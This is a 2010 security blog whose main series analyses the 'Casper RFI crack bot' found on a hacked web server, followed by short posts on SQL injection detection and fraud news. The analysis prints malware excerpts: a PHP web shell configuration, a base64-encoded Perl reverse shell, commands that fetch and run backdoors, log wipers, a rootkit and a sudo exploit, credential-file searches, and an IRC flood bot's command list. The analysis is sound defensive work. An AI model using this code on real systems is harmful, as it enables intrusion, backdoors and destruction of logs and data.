Irregular Expressions


August 22, 2010  9:44 PM

Casper RFI crack bot – Part 5

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de, both sites are no longer up and have not been for a while.

There is also a few things worth looking in to here, the script mentions fx29shell.php.  Which is a php shell that can be loaded onto the system.

I can do all kinds of nasty to your web server, you can download the /etc/passwd for a start. Not good if you find this on your system, might be a good time to do some google searches against your domain (while we are talking about it).

So after all of this it looks likes capser.(pl|txt) is the main thing doing all of the work. As you can tell with all of the variables.

$admin       = "XXXXX";
$serverircs  = array("irc.xxxxx.xxx");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";

In the next section we will do a closer look at casper now that we poked around a bit.

August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

sh.txt

This one also looks juicy!

Another php,

<?php
$sh_id = “Q2FTcEVyX0thRUB5YWhPTy5jT20=”;
$sh_ver = “0.0 01.01.2010″;
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = “http://xxxxxx.ru/config/”;
$html_start = ”.
‘<html><head>
<title>’.getenv(“HTTP_HOST”).’ – ‘.$sh_name.’</title>
<style type=”text/css”>
<!–

What are you up to with this one?

We have lots of toys to play with.

//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
$host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //Pesan HTTP-Auth
$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //Jika TRUE, update shell sekarang.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = "xxxxx_xxx@yahoo.com"; //email untuk pengiriman log.
$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
$sess_cookie = "c99shvars"; //Nama variabel Cookie
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);
}

A few functions on checking and reporting disk usage..

Now this is worth tracking down.

//milw0rm search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi("Linux",$OSV)) {
  $Lversion=substr($Lversion,0,6);
  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
} else {
  $Lversion=substr($Lversion,0,3);
  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search

I wish milw0rm was still around so we could see what those are for :(

Here is a few things that are encrypted.

$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7
DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0k
QVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGll
KCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsN
CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+
JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3Rl
bSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4i
Ow0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

And a few others, no point in sharing :)

We are sure reporting back for a lot of things.

  $cmdaliases = array(
    array("", "ls -al"),
    array("Find all suid files", "find / -type f -perm -04000 -ls"),
    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
    array("Find config* files", "find / -type f -name \"config*\""),
    array("Find config* files in current dir", "find . -type f -name \"config*\""),
    array("Find all writable folders and files", "find / -perm -2 -ls"),
    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
    array("Find all writable folders", "find / -type d -perm -2 -ls"),
    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
    array("Find all service.pwd files", "find / -type f -name service.pwd"),
    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
    array("Find all .bash_history files", "find / -type f -name .bash_history"),
    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
    array("List file attributes on a Linux second extended file system", "lsattr -va"),
    array("Show opened ports", "netstat -an | grep -i listen")
  );

OK now this is nice!

  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  );

Looking for a few more things. We pull down some log wipers, from packetstorm, and grab RatHole 1.2 from the same place, and a local sudo exploit.

This is a big one, I will have to continue this tomorrow.


August 21, 2010  12:12 AM

Casper RFI crack bot – Part 3

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

iso.txt is looking promising for a peak.

#!/usr/bin/perl
#
#  ShellBOT by: XXXXXXXXXXXX
#       Greetz: XXXXXXXXXXXXXX
#
# Comandos:
#           @oldpack <ip> <bytes> <tempo>;
#           @udp <ip> <porta> <tempo>;
#           @fullportscan <ip> <porta inicial> <porta final>;
#           @conback <ip> <porta>
#           @download <url> <arquivo a ser salvo>;
#           !estatisticas <on/off>;
#           !sair para finalizar o bot;
#           !novonick para trocar o nick do bot por um novo aleatorio;
#           !entra <canal> <tempo>
#           !sai <canal> <tempo>;
#           !pacotes <on/off>
#           @info
#           @xpl <kernel>
#           @sendmail <assunto> <remetente> <destinatario> <conteudo>

I am liking this one already!

We also got more irc servers.

$servidor='irc.xxxxx.xxx' unless $servidor;
my $porta='6667';
my @canais=("#xxxxxxx");
my @adms=("XXXXXX");

This is a good one, it’s logging into a irc server, reporting in and waiting for commands.

Lots of goodies in here to go through, another one to come back and spend a little more time on.

There is yet a few more and they seem to be getting better.


August 21, 2010  12:04 AM

Casper RFI crack bot – Part 2

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

There is more then one file in each rar that appears to be a copy of the bot. The differences are pretty minor.

scan.txt
-my @servers = ("irc.xxxx.org");
+my @servers = ("irc.xxxxxx.org","irc.xxxxxx.org");

@@ -3,7 +3,7 @@
 ################################
 #  CASPER RFI CRACK Bot v1.1   #
 #  By Kiss_Me Alert jan 2010.  #
-#     Casper_kae@yahoo.com     #
+#     carisma2009@gmail.com    #
 ################################

We also have a hand full of IRC servers listed in the files, with connection information.  That could be fun but also a lot of trouble :)

 var $config = array("server"=>"irc.xxxxxx.org",
                     "port"=>"6667",
                     "pass"=>"xxxx",
                     "prefix"=>"vai",
                     "maxrand"=>"15",
                     "chan"=>"#xxxx",
                     "chan2"=>"",
                     "key"=>"",
                     "modes"=>"+p",
                     "password"=>"xxxxx",
                     "trigger"=>".",
                     "hostauth"=>"*" // * for any hostname (remember: /setvhost pucorp.org)
                     );

That’s worth looking at pucorp.org… Browsing there does not seem to do much but, there is hidden text ! spiffy.

wget --mirror pucorp.org

What is the text?

No idea, it does appear to be from multiple servers but I am not sure at this point why its being dumped into here. We will have to come back to this.

There is yet more scripts included in here, iso.txt is worth a look.


August 20, 2010  10:31 PM

Casper RFI crack bot – Part 1

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

If you saw the ISC today (isc.sans.edu) there is a posting about a perl Unix bot making the rounds.

http://isc.sans.edu/diary.html?storyid=9430

There is signatures around from emerging threats to detect the bot, if you need them. http://doc.emergingthreats.net/2011176

I have found a server with almost* everything intact so this should be interesting..

First I am going to start with the site, the one I found was something like this (I am not going to give the real URL, I have already informed them about this)

http://XXX.XXX/e107_images/casper/

Google found this pretty fast, I would have suspected if you have that much control over a web server you would have started by editing the robo.txt so no one can find your little prize. But then again people can be lazy.

The casper dir has a lot of txt’s in it, but if you go one level back you see something that’s really nice.

-rw-r--r-- 1     2e107_images.rar
drwxr-xr-x 2     casper
-rw-r--r-- 1     e107_images.rar

Humm, we have the dir named casper and two rar’s?

A little odd but not totally out of place, whats inside of these bad boy’s?

2e107_images.rar
bot.txt
casper2.txt
casper.txt
cmd_kod.txt
def.txt
eggdrop.tar.gz.tar
iso.txt
psy.tar.gz.tar
sat.txt
scan.pl
scan.txt
sh.txt

e107_images.rar
Ckrid1.txt
Ckrid2.txt
iso.txt
myid.jpg
nnee.pl
nnee.txt
php.jpg
scan2.txt
scan.txt

Ohh pay dirt!

Not only do we have one, but we have two and they seem to be from different sources. A little diff will let us know what is going on.

Only in 2: bot.txt
Only in 2: casper2.txt
Only in 2: casper.txt
Only in e: Ckrid1.txt
Only in e: Ckrid2.txt
Only in 2: cmd_kod.txt
Only in 2: def.txt
Only in 2: eggdrop.tar.gz.tar

This is good to know, we will have to come back to that tar.

Next post we will start going through the files and see what the deal is with these two rar’s is.


August 16, 2010  5:21 PM

Good blog on iPhone / iPad hacking

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

http://blog.iphone-dev.org/

I wish I could link to the first article.  It talks about a patch out for non early iPhone and iPod touch users that leaves them with security holes, that they fixed and can be applied through Cydia!

I really appreciate people that take their time to give back to the community.  You can test to make sure it has worked by going to jailbreakme.com, it should fail.

If you want to install Cydia, go to jailbreakme.com :) and run the web app. Then you can install the fix.


August 16, 2010  5:02 PM

The SQL CAST statement..

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

http://isc.sans.edu/diary.html?storyid=9397

I have played with this before, the most effective method I found of blocking these was looking for the CAST statement itself.

The statement at least from the ones that I was playing with all had a “CAST”, “SET”, “VARCHAR”, and “EXEC”.  I found that some of vendors seem to be looking for the HEX or some mix because I made variations of the HEX made over and over again until it made its way through with the same SELECT statement.  I found the best way to detect these events was to look for the “CAST” with the other markers, in my case there was no use for “CAST” in my network so I just started to alert on all of that.

This is a good break down and decode, its worth reading!


August 16, 2010  4:55 PM

Security Reporting

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Here is a usful link from isc.sans.edu on “The Seven Deadly Sins of Security Reporting”

http://isc.sans.edu/diary.html?storyid=9400

All of them are great points, but I think # 1 is really important and one of the places where a lot of people can run into trouble.  Also # 3 ties into that, everyone has a black berry but are they really available after hours with them or do they get ignored?

Most of the other points are strait forward, but at the end of the day if you can’t be reached or reach anyone your vulnerabilities are problems you are going to need to work to.

Also after all of that work, reports are sent out on a secure channel, printed and left on a desk.

:)


August 12, 2010  12:38 PM

Part 2 of the Inj3ct0r facebook hack

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Enjoy!

http://inj3ct0r.com/exploits/13403


August 12, 2010  12:35 PM

Cheque counterfitting, old school problem with new toys!

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

This will be fully released at blackhat, but here is a link to what has been released.

http://news.cnet.com/8301-27080_3-20011885-245.html

They were using a network of infected machines and mules to have checks cashed and sent to Russia.  They used PPTP VPN’s to moving the information around and scrapped job sites looking to people to mule the money with fake job offers. They dubbed the network “Big Boss”.


Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: